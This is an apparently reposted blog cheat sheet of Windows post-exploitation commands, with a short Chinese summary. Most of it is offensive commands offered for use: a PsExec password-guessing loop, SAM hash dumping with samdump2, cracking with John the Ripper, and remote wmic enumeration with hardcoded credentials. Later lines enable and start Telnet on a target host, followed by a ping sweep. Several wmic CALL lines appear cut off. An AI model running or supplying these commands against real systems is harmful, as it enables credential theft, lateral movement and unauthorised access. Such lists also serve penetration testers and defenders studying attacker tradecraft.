Command For Information Gathering Of Windows Post Exploitation

最新推荐文章于 2025-08-24 15:26:47 发布

翻译最新推荐文章于 2025-08-24 15:26:47 发布 · 993 阅读

文章标签：

#command #windows #service #system #list #c

常用腳本专栏收录该内容

1 篇文章

订阅专栏

本文介绍了一系列用于收集Windows系统信息的方法和技术，包括如何获取系统基本信息、运行的服务、环境变量、用户信息、网络配置等。此外还介绍了使用特定工具进行密码猜测、哈希提取及破解的过程。

If you want to see all command and results of each command, please go to the Source.

gathering System related information 
C:\>systeminfo 

Running Services
C:\>tasklist /svc 

Installed Services 
C:\>sc query state= all

Current environment settings
C:\>set

Find Username
C:\>set | find "USERNAME"

Find Domain
C:\>set | find "USERDOMAIN" 

Find Current User Information 
C:\>net user John 

Find Users with Administrator Privileges in the current machine
C:\>net localgroup Administrators
 
Password Guessing with PsExec
Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt 
C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula -u Jack -p %i "ipconfig" 2>nul && echo 

***************** %i *****************

Extract Hashes from the sam and system file with samdump2
:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist
# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information
C:\>ipconfig /displaydns

OS Information 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Services Information 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 
 
Starting telnet service 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep 
C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"

Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html